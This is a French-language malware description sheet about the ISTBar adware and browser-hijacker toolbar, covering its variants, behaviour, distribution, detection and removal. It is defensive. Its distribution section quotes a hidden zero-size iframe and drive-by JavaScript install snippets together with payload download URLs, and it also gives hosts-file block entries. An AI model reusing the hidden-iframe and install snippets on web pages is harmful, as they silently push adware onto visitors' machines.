ISTBar

ISTbar est une barre d'outils pour Internet Explorer, qui s'implante à l'insu des utilisateurs (hijack par "drive by download"), connait de nombreuses variantes, installe à son tour d'autres parasites, bombarde l'utilisateur de fenêtres publicitaires en pop-ups et dirige l'internaute vers des sites pornographiques.

Nom
ISTBar
ISTBar vient de IST (ISearchTech - Integrated Search Technology), la société qui a développé ce parasite.

Autres noms
1stbat - ISTBar est quelquefois orthographié 1stbar (pour First bar, probablement une erreur de lecture du I (i majuscule) pris pour le chiffre 1 suivi de st pour "first").
xxxtoolbar, istsvc.exe, Adware.Istbar, AUpdate, DownloadPlus, TrojanDownloader.Win32.Toolbar.b [Kaspersky].
La variante ISTbar/AUpdate est aussi connue sous le nom de SearchBarCash-Hijacker.
La variante ISTbar/MSCache est aussi connue sous le nom de MSUpdates\MSCache
ISTbar est appelé Xrenoder par PestPatrol car c'est le nom de l'un des sites "bénéficiant" de ce hijack depuis avril 2003 avec une implantation très agressive.

Description
Sous prétexte d'être une barre d'outils pour Internet Explorer, la barre d'outils ISTBar est un gestionnaire de publicités (Adware) et un téléchargeur (downloader) pyramidal s'installant sous la forme d'un BHO, sous la conduite (drive by download) d'un contrôle ActiveX. Ce parasite :

modifie la page de démarrage d'Internet Explorer (hijack) pour le faire démarrer sur divers sites "orientés" comme 'search.xrenoder.com'
modifie la page de recherche d'Internet Explorer (hijack) pour diriger vers des sites pornographiques
affiche des fenêtres publicitaires (popup) pour des sites pornographiques

Les variantes d'ISTbar appelées ISTbar/AUpdate et ISTbar/XXXToolbar, entre autres, agissent massivement en téléchargeur (downloader). Une fois que ces variantes du parasite ISTBar ont réussi à s'installer, elles téléchargent et installent à leur tour des gestionnaires de publicités (Adware) pornographiques (les publicités s'affichent sous forme de pop-ups) comme RapidBlaster/lp.

La variante AUpdate, en tant que téléchargeur (downloader) télécharge et installe, à son tour, un autre téléchargeur (downloader), "DownloadPlus".

PestPatrol voit également ISTBar télécharger et installer le logiciel publicitaire (adware) Bargain Buddy.

La variante MSCache installe, en cascade, le parasite nCase.

ISTbar utilise, pour s'implanter, un contrôle ActiveX très agressif, depuis des sites affiliés.

ISTBar exploite, pour s'installer, une faille de sécurité ancienne et poursuit son installation même si vous la refusez (lorsque vos réglages d'Internet Explorer oblige ce dernier à vous consulter mais cette "interruption" est souvent supprimée par les utilisateurs qui préfèrent ne rien contrôler du tout ! Voir Anti-ActiveX).

Variantes
La variante d'ISTbar appelée AUpdate s'appuie sur une version personnalisée de TinyBar (une malveillance généraliste permettant de créer des hijack, des Adwares de type intrusifs avec boutons et des barres d'outils dans Internet Explorer et qui est commercialisée sur un site sans scrupule auprès de Webmasters tout autant sans scrupule) pour s'implémenter en tant que barre d'outils (toolbar). Ce hijacker est alors pris en charge par les sites my-internet.info et blazefind.com. Sa distribution est pilotée depuis searchbarcash.com. Les mises à jour sont téléchargées par un process nommé AUpdate (à tuer par alt-ctrl-suppr). Cette variante est aussi connue sous le nom de SearchBarCash-Hijacker.

La variante d'ISTbar appelée MSCache s'appuie également sur une version personnalisée de TinyBar pour s'implémenter en tant que barre d'outils (toolbar). Les mises à jour sont téléchargées par un BHO (Browser Helper Object) appelé mscache.dll. Les serveurs sont skoobidoo.com et www2.skoobidoo.com

La variante d'ISTbar appelée XXXToolbar s'appuie sur une version personnalisée de Pugi-Toolbar. Tout son univers (liens, publicités, Mots-clés etc. ...) est orienté pornographie. Cette malveillance est pilotée par les serveurs xxxtoolbar.com et slotch.com. Sa distribution est pilotée depuis toolbarcash.com.

Ce que fait ce parasite :

Publicitée	Violation de la vie privée	Introduit une faille de sécurité	Introduit une instabilité du système
Oui	Oui	Oui	Oui

Publicité :
Popup pornographique pour XXXtoolbar
TinyBar aurait des capacités de popup qui ne seraient pas encore exploitées.
Toutes les variantes ont la possibilité d'installer des programmes de tierces parties dont des adwares.
Violation de la vie privée :
Agit en téléchargeur (downloader) permettant à des tierces parties d'installer des spywares, keylogger, adwares et autres formes de malveillances. Pas de clause générale d'utilisation par l'utilisateur final (licence type EULA - End User Licence Agreement) ni de clause Vie privée (Privacy).
Introduit une faille de sécurité :
Permet de télécharger et d'exécuter du code quelconque depuis son serveur. Cette fonctionnalité est utilisée pour mettre à jour le programme en lui-même qui peut ainsi avoir de nouvelles fonctionalités inconnues et, d'autre part, pour permettre à des tierces parties inconnues de télécharger, installer et exécuter des programmes inconnus.
Introduit une instabilité du système :
Peut provoquer des erreurs dans Windows XP. Le hijack de la page de recherches d'Internet Explorer provoque un ralentissement de celui-ci.

Editeur
Integrated Search Technologies (IST) - une société du groupe Gammacash.
PestPatrol indique que XRenoder serait développé par le tristement célèbre Brilliant Digital ce qui me paraît être une erreur d'attribution de paternité.
Le site de l'outil (qui s'appelle xxxtoolbar) est à http://www.xxxtoolbar.com/ (attention c'est du X) et il existe un script d'affiliation pour webmasters (les webmasters piègent leurs sites grâce à un piège fourni par IST et perçoivent des royalties pour chaque internaute contaminé grâce à leurs sites piégés).
Le générateur de plusieurs variantes de cette malveillance est TinyBar dont l'auteur est Asher Nahmias.

Autres produits du même éditeur
http://www.toolbarcash.com
ISTBar/mscache
ISTBar/AUpdate

Méthode de distribution
Diverses méthodes dont depuis des sites affiliés à l'éditeur de la malveillance et qui touchent une rémunération pour chaque installation. XXXtoolbar est essentiellement installée depuis des sites pornographiques. L'installation sur votre ordinateur est assurée par un contrôle ActiveX présent sur ces sites et à cause du laxisme de vos réglages ActiveX dans Internet Explorer. Voir Anti ActiveX pour y rémédier.

Que se passe t'il ? Vous visitez une page piégée d'un site. Cette page comporte un ordre d'affichage d'une autre page dans un iFrame caché (dont les dimensions sont de 0 pixel sur 0 pixel). Voici, par exemple, une ligne commandant cet "affichage" :

<iframe src="http://www3.kinghost.com/teen/pornuxa/toolbar.html" width=0 height=0 style="display:none"></iframe>

Vous avez remarqué, en anglais, largeur=0 et hauteur=0
Vous ne voyez donc rien mais dans cette page cachée se trouve l'ordre d'installation de la xxxtoolbar. Si vos réglages d'Internet Explorer contrôlent les installations, un avertissement vous permet de le refuser :

Si vos réglages sont laxistes (ou si vous acceptez), voici, le code exécuté : c'est un script en javascript, tel qu'il apparaît dans une page piégée - on peut y voir l'identification (code "id") du site qui sera rémunéré pour sa contribution au déploiement de la malveillance. Ce script lance l'installation du contrôle ActiveX

<script language="JavaScript" type="text/JavaScript"
src="http://install.xxxtoolbar.com/ist/scripts/prompt.php
?event_type=onload
&recurrence=always
&retry=2
&loadfirst=0
&delayload=0
&account_id=134265
&adid=a1079202760">
</script>

En voici un autre : c'est exactement le même script, seuls les identifications du site (du webmaster) à rémunérer changent ainsi que quelques paramètres d'installation.

<script type="text/JavaScript" language="JavaScript"
src="http://install.xxxtoolbar.com/ist/scripts/prompt.php
?event_type=onload
&recurrence=always
&retry=3
&loadfirst=1
&account_id=133666
&delayload=0
&adid=a1064352429">
</script>

Le fichier d'installation pour IE est 0006_regular.cab (au 22.09.04)
h__p://www.xxxtoolbar.com/ist/softwares/v4.0/0006_regular.cab
Ce contrôle ActiveX a un CLSID de 386A771C-E96A-421f-8BA7-32F1B706892F
Le fichier d'installation pour Netscape/Mozilla est istinstall_netscape.exe (au 22.09.04)
h__p://www.slotch.com/ist/softwares/installers/istinstall_netscape.exe

Le script d'installation tel qu'on le trouve à la page http://install.xxxtoolbar.com/ist/scripts/prompt.php

ISTbar/MSCache a été largement diffusé auprès de victimes cliquant vers le jeu en ligne 'OutWar'.
Egalement "disponible" en téléchargement (download) direct depuis le site de l'éditeur
Egalement contenu dans de nombreux programmes qui en assurent le déploiement et l'installation (agissent en Chevaux de Troie).

Détection
Présence du fichier C:\Program Files\ISTsvc\ISTsvc.exe
Détection sous le nom de Adware.ISTSvc par Norton Antivirus
Ralentissement de votre navigation.

Informations techniques
Crée le répertoire C:\Program Files\ISTsvc
Ajoute "IST Service" = "C:\Program Files\ISTsvc\ISTsvc.exe" à la clé de registre
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
afin d'assurer son lancement automatique au démarrage de Windows
Crée la clé de registre HKEY_LOCAL_MACHINE\Software\ISTsvc
Installe une barre d'outil dans Internet Explorer
Hijack (modification intempestive à l'insu de l'utilisateur) la page de démarrage d'Internet Explorer
Hijack (modification intempestive à l'insu de l'utilisateur) la page de recherche d'Internet Explorer
Agit en adware affichant des pop-ups pornographiques
Agit en téléchargeur (downloader) pour des applications de tierces parties, permettant ainsi l'installation de spywares, d'autres adwares et toutes autres formes de malveillances.

Eradication
Toujours exécuter l'intégralité de "La Manip" après cette désinfection.

Eradication Manuelle

Vous devez connaître et maîtriser les actions manuelles suivantes
Faire les manipulations suivantes :
- Tuez les processus suivants s'ils existent
  ist.exe
  istsvc.exe
  mcinstl.exe
- Variante ISTBar/AUpdate
  - Détruire les entrées de clé de registre suivantes:
    Dans la clé HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    détruire l'entrée 'AutoUpdater' pointant vers aupdate.exe.
  - Détruire les clés suivantes:
    HKEY_CLASSES_ROOT\CLSID\{69550BE2-9A78-11D2-BA91-00600827878D}
    HKEY_LOCAL_MACHINE\clsid\{69550be2-9a78-11d2-ba91-00600827878d}
    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Explorer Bars\
    {69550be2-9a78-11d2-ba91-00600827878d}
    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\
    {69550be2-9a78-11d2-ba91-00600827878d}
    HKEY_LOCAL_MACHINE\typelib\{69550be2-9a78-11d2-ba91-00600827878d}
  - Redémarrer l'ordinateur.
  - Détruire, dans le répertoire système ('System32' pour Windows NT/2000/XP ou 'System' pour Windows 95/98/Me), les fichiers :
    - 'aupdate.exe'
    - 'aupdate.conf'
    - 'aupdate.trk'
    - 'aupdate_uninstall.exe'
  - Restaurer enfin les pages de recherche d'IE
  - Passer à la recherche des malveillances suivantes qui ont de fortes chances d'avoir été implantées aussi.
    - RapidBlaster
    - DownloadPlus.
- Variante ISTBar/MSCache
  - Ouvrir une fenêtre de ligne de commande DOS (Démarrer > Tous les programmes > Accessoires > Invite de commandes) et entrer très exactement les commandes suivantes:
    cd "%WinDir%\System"
    regsvr32 /u ../mscache.dll
    Puis, ouvrir la base de registre (Démarrer > Exécuter > Regedit) et localiser la clé:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
    Y détruire l'entrée (l'entrée seulement, pas a clé) 'MS Updates' pointant vers mscache.exe.
  - Détruire les clés suivantes:
    HKEY_CLASSES_ROOT\CLSID\{69550BE2-9A78-11D2-BA91-00600827878D}.
    HKEY_LOCAL_MACHINE\clsid\{69550be2-9a78-11d2-ba91-00600827878d}
    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Explorer Bars\
    {69550BE2-9A78-11D2-BA91-00600827878D} .
    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\
    {69550BE2-9A78-11D2-BA91-00600827878D} .
    HKEY_LOCAL_MACHINE\typelib\{69550be2-9a78-11d2-ba91-00600827878d}
    HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\ms aupdate
  - Redémarrer l'ordinateur.
  - Détruire, dans le répertoire système ('System32' pour Windows NT/2000/XP ou 'System' pour Windows 95/98/Me), les fichiers :
    - 'mscache.exe'
    - 'mscache.dll'
    Restaurer enfin les pages de recherche d'IE
    Passer à la recherche des malveillances suivantes qui ont de fortes chances d'avoir été implantées aussi.
    - nCase
    - Wink/EasyDates (une variante de AutoSearch).
- Variante ISTBar/XXXToolbar
  - Ouvrir la base de registre et localiser la clé HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
    Y détruire l'entrée (l'entrée seulement, pas a clé) 'IST Service' si elle existe (quelques versions initiales de XXXToolbar n'ont pas ceci).
    Ouvrir une fenêtre de ligne de commande DOS (Démarrer > Tous les programmes > Accessoires > Invite de commandes) et entrer très exactement les commandes suivantes:
    - cd "%WinDir%\System"
    - regsvr32 /u "\Program Files\ISTbar\istbar.dll"
    
    Détruire les clés de registre suivantes incluant les clés de la malveillance BargainBuddy
    hkey_classes_root\software\microsoft\windows\currentversion\explorer\browser helper objects\{c82b55f0-60e0-478c-bc55-e4e22f11301d}
    hkey_classes_root\apuc.urlcatcher
    hkey_classes_root\apuc.urlcatcher.1
    hkey_classes_root\clsid\{014da6c4-189f-421a-88cd-07cfe51cff10}
    hkey_classes_root\clsid\{014da6c5-189f-421a-88cd-07cfe51cff10}
    hkey_classes_root\clsid\{49c3014f-03ed-4634-9fb2-2881f2c7a057}
    hkey_classes_root\clsid\{4eb7bbe8-2e15-424b-9ddb-2cdb9516a2a3}
    hkey_classes_root\clsid\{4f9d4163-23f0-42e1-afda-4c1a6f8607e7}
    hkey_classes_root\clsid\{60f8fb2a-9915-4202-967d-1fa694a8bcf5}
    hkey_classes_root\clsid\{676058db-89bd-11d6-8a8c-0050ba8452c0}
    hkey_classes_root\clsid\{676058e3-89bd-11d6-8a8c-0050ba8452c0}
    hkey_classes_root\clsid\{676058e4-89bd-11d6-8a8c-0050ba8452c0}
    hkey_classes_root\clsid\{6e1c7285-263b-431d-8b83-c3cbce301704}
    hkey_classes_root\clsid\{72f81209-6c73-4de7-a3dc-408a8bd472fb}
    hkey_classes_root\clsid\{974cc25e-d62c-4278-84e6-a806726e37bc}
    hkey_classes_root\clsid\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}
    hkey_classes_root\clsid\{9dbafccf-592f-ffff-ffff-00608cec297b}
    hkey_classes_root\clsid\{b8afa251-4efb-4703-87d4-da7d2435ba5e}
    hkey_classes_root\clsid\{be35582c-9796-4cf1-aed9-556ada120b38}
    hkey_classes_root\clsid\{c6906a23-4717-4e1f-b6fd-f06ebed14177}
    hkey_classes_root\clsid\{ce31a1f7-3d90-4874-8fbe-a5d97f8bc8f1}
    hkey_classes_root\clsid\{cf1e49b3-24a6-4b17-94be-c25102e3bf04}
    hkey_classes_root\clsid\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}
    hkey_classes_root\clsid\{f94c0089-9394-4e44-b4ea-58dba1f7b84e}
    hkey_classes_root\interface\{c6906a23-4717-4e1f-b6fd-f06ebed14177}
    hkey_classes_root\software\microsoft\windows\currentversion\explorer\browser helper objects\{ce31a1f7-3d90-4874-8fbe-a5d97f8bc8f1}
    hkey_classes_root\typelib\{4eb7bbe8-2e15-424b-9ddb-2cdb9516a2a3}
    hkey_local_machine\software\bargains
    hkey_local_machine\software\classes\clsid\{000004cc-e4ff-4f2c-bc30-dbef0b983bc9}
    hkey_local_machine\software\classes\clsid\{00000ef1-34e3-4633-87c6-1aa7a44296da}
    hkey_local_machine\software\classes\clsid\{014da6c1-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6c2-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6c3-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6c5-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6c7-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6c9-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{014da6cb-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\clsid\{018b7ec3-eeca-11d3-8e71-0000e82c6c0d}
    hkey_local_machine\software\classes\clsid\{136a9d1d-1f4b-43d4-8359-6f2382449255}
    hkey_local_machine\software\classes\clsid\{49c3014f-03ed-4634-9fb2-2881f2c7a057}
    hkey_local_machine\software\classes\clsid\{4f9d4163-23f0-42e1-afda-4c1a6f8607e7}
    hkey_local_machine\software\classes\clsid\{676058e4-89bd-11d6-8a8c-0050ba8452c0}
    hkey_local_machine\software\classes\clsid\{6e1c7285-263b-431d-8b83-c3cbce301704}
    hkey_local_machine\software\classes\clsid\{730f2451-a3fe-4a72-938c-fc8a74f15978}
    hkey_local_machine\software\classes\clsid\{ce31a1f7-3d90-4874-8fbe-a5d97f8bc8f1}
    hkey_local_machine\software\classes\clsid\{cf1e49b3-24a6-4b17-94be-c25102e3bf04}
    hkey_local_machine\software\classes\clsid\{d7f2fd62-6c1b-4b52-85b1-f65a414bf050}
    hkey_local_machine\software\classes\clsid\{e5dfb380-3988-4c07-8afb-8a47769d9db5}
    hkey_local_machine\software\classes\interface\{014da6c4-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\interface\{014da6c6-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\interface\{014da6ca-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\interface\{014da6cc-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\interface\{297afc77-2039-4d3c-bef9-598819eb2c8a}
    hkey_local_machine\software\classes\interface\{676058e3-89bd-11d6-8a8c-0050ba8452c0}
    hkey_local_machine\software\classes\interface\{9388907f-82f5-434d-a941-bb802c6dd7c1}
    hkey_local_machine\software\classes\interface\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}
    hkey_local_machine\software\classes\interface\{b8afa251-4efb-4703-87d4-da7d2435ba5e}
    hkey_local_machine\software\classes\interface\{c6906a23-4717-4e1f-b6fd-f06ebed14177}
    hkey_local_machine\software\classes\interface\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}
    hkey_local_machine\software\classes\interface\{f94c0089-9394-4e44-b4ea-58dba1f7b84e}
    hkey_local_machine\software\classes\typelib\{014da6c0-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\classes\typelib\{4eb7bbe8-2e15-424b-9ddb-2cdb9516a2a3}
    hkey_local_machine\software\classes\typelib\{60f8fb2a-9915-4202-967d-1fa694a8bcf5}
    hkey_local_machine\software\classes\typelib\{676058db-89bd-11d6-8a8c-0050ba8452c0}
    hkey_local_machine\software\classes\typelib\{8c752c5e-3c10-4076-af0a-ffc69fa20d1b}
    hkey_local_machine\software\classes\typelib\{974cc25e-d62c-4278-84e6-a806726e37bc}
    hkey_local_machine\software\classes\typelib\{be35582c-9796-4cf1-aed9-556ada120b38}
    hkey_local_machine\software\classes\typelib\{ef100607-f409-426a-9e7c-cb211f2a9030}
    hkey_local_machine\software\microsoft\code store database\distribution units\{018b7ec3-eeca-11d3-8e71-0000e82c6c0d}
    hkey_local_machine\software\microsoft\internet explorer\toolbar{014da6c9-189f-421a-88cd-07cfe51cff10}
    hkey_local_machine\software\microsoft\internet explorer\toolbar{6e1c7285-263b-431d-8b83-c3cbce301704}
    hkey_local_machine\software\microsoft\windows\currentversion\app management\arpcache\""
    hkey_local_machine\software\microsoft\windows\currentversion\explorer\browser helper objects\{ce31a1f7-3d90-4874-8fbe-a5d97f8bc8f1}
    hkey_local_machine\software\microsoft\windows\currentversion\moduleusage\
    c:/winnt/downloaded program files/istactivex.dll{018b7ec3-eeca-11d3-8e71-0000e82c6c0d}
    hkey_local_machine\software\microsoft\windows\currentversion\runbargains
    hkey_local_machine\software\microsoft\windows\currentversion\rundkry
    hkey_local_machine\software\microsoft\windows\currentversion\uninstall\""
    hkey_local_machine\software\mysearch\bar\partnerexe
    hkey_local_machine\software\mysearch\bar\partnername
    hkey_local_machine\software\mysearch\bar\partnerurl
    hkey_classes_root\clsid\{69550be2-9a78-11d2-ba91-00600827878d}
    hkey_classes_root\clsid\{69555be2-9a78-11d2-ba91-00600827878d}
    hkey_classes_root\clsid\{8fb0f3e2-5193-11d7-9f88-0050fc5441cb}
    hkey_classes_root\component categories\{00021493-0000-0000-c000-000000000046}\enum
    hkey_classes_root\component categories\{00021494-0000-0000-c000-000000000046}\enum
    hkey_current_user\software\microsoft\internet explorer\menuext\>>> search the web <<<<
    hkey_current_user\software\microsoft\internet explorer\toolbar\webbrowser\itbarlayout
    hkey_local_machine\software\microsoft\internet explorer\explorer bars\{69550be2-9a78-11d2-ba91-00600827878d}
    hkey_local_machine\software\microsoft\internet explorer\explorer bars\{69555be2-9a78-11d2-ba91-00600827878d}
    hkey_local_machine\software\microsoft\internet explorer\explorer bars\{69555be2-9a78-11d2-ba91-00600827878d}
    hkey_local_machine\software\microsoft\internet explorer\explorer bars\{8fb0f3e2-5193-11d7-9f88-0050fc5441cb}
    hkey_local_machine\software\microsoft\internet explorer\toolbar{69550be2-9a78-11d2-ba91-00600827878d}
    
    Redémarrer l'ordinateur.
    Détruire les répertoires suivants s'ils existent:
    - C:\Program Files\istbar
    - C:\Program Files\ISTsvc\
    Détruire le fichier suivant s'il existe
    - 'istsvc.exe' dans le répertoire Windows.
    Détruire, éventuellement, les clés de registre
    HKEY_CURRENT_USER\Software\ISTbar
    HKEY_CLASSES_ROOT\Pugi.PugiObj
    HKEY_CLASSES_ROOT\Pugi.PugiObj.1
    
    Détruire les
    - favorites+\adult sites
    - favorites+\free adult content
    qui contiennent des centaines de pointeurs vers sites pornographiques affiliés
    
    Restaurer enfin les pages de recherche d'IE
- Il est probable que des produits compagnons et des produits de tierces parties vous infestent simultanément. Passez à la recherche des malveillances suivantes qui ont de fortes chances d'avoir été implantées aussi.
  
  - RapidBlaster.
  - DownloadPlus
  - nCase
  - Wink/EasyDates
Eradication automatique avec son propre uninstal
- La variante ISTbar/AUpdate dispose d'une entrée dans ajout / supression de programmes sous le nom de MS AUpdate qui ne retire pas la toolbar ni RapidBlaster.
- La variante ISTbar/MSCache dispose d'une entrée dans ajout / supression de programmes sous le nom de MS Updates qui ne fonctionne pas du tout.
- La variante ISTbar/XXXToolBar dispose d'une entrée dans ajout / supression de programmes sous le nom de ISTBar qui ne retire pas RapidBlaster.
Eradication automatique avec un outil

La plupart des antivirus prennent en charge ce parasite. Il faut toutefois désactiver les points de restauration de Windows pour permettre la destruction de ces zones protégées qui contiennent une sauvegarde de la malveillance, assurant se réinstallation. Réactiver les points de restauration ensuite.
- Mettre à jour votre antivirus (base de signatures et programme lui-même). Suivre les indications de votre antivirus.
- Exécuter une analyse (un scan) de l'intégralité du système (Suivre les indications de votre antivirus) et détruire tous les fichiers identifiés comme appartenant à cette malveillance (selon la procédure propre à votre antivirus).
- Détruire les valeurs introduites dans la base de registre
- Nettoyer manuellement la base de registre en faisant:
  1. Démarrer > Exécuter
  2. Tapez regedit > clic sur OK (l'éditeur de base de registre s'ouvre)
  3. Localisez la clé : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  4. Dans le volet de droite, supprimez la valeur "IST Service" = "C:\Program Files\ISTsvc\ISTsvc.exe"
  5. Localisez la clé : HHKEY_LOCAL_MACHINE\Software\ISTsvc
  6. Détruisez cette clé
  7. Quittez l'éditeur de base de registre
  Ad-aware depuis sa reflist du 20.04.2003 éradique la variante ISTbar/AUpdate
  SpyBot Search and Destroy depuis sa mise à jour du 24.04.2003 éradique la variante ISTbar/AUpdate.
  toujours exécuter l'intégralité de "La Manip" après cette désinfection.

Conséquences de l'éradication
Généralement, le programme hôte, s'il y en a un, ne fonctionnera plus.

D'autre part, il est probable que des produits compagnons et des produits de tierces parties vous infestent simultanément. Recherchez les malveillances suivantes:
- RapidBlaster
- DownloadPlus
- nCase
- Wink/EasyDates

Suggestion de serveurs a ajouter à hosts pour les bloquer
Hosts - Qu'est-ce que c'est?
127.0.0.1 cj.xrenoder.com
127.0.0.1 cons.xrenoder.com
127.0.0.1 search.xrenoder.com

Suggestion d'IPs de serveurs à bloquer
Par exemple en utilisant PeerGuardian.
193.125.201.45
193.125.201.50

Cookies à éradiquer utilisés par ce parasite
my-internet.info
blazefind.com
searchbarcash.com
www2.skoobidoo.com
xxxtoolbar.com
slotch.com
toolbarcash.com

Liens, sources et ressources
Pour rédiger cette fiche, les sites suivants ont été consultés
Norton / Symantec
Simply the best
PestPatrol
and.doxdesk.com

Porter plainte
Portez plainte ici
O.C.L.C.T.I.C
MINISTERE DE L'INTERIEUR
Direction Centrale de la Police Judiciaire
Sous-Direction des Affaires Economiques et Financières
8, rue de Penthièvre
75008 PARIS
Tel : 01.49.27.49.27
Télécopie : 01.40.97.88.59
oclctic@interieur.gouv.fr

Retour d'information (FeedBack)
S'il y a la moindre chose nouvelle ou a ajouter ou a corriger sur cette page, merci d'utiliser le petit formulaire de feedback (bouton ci-dessous).

ISTBar

Barre d'outils ISTBar

Nouvelle adresse du site Assiste.com depuis le 22 octobre 2012 : http://assiste.com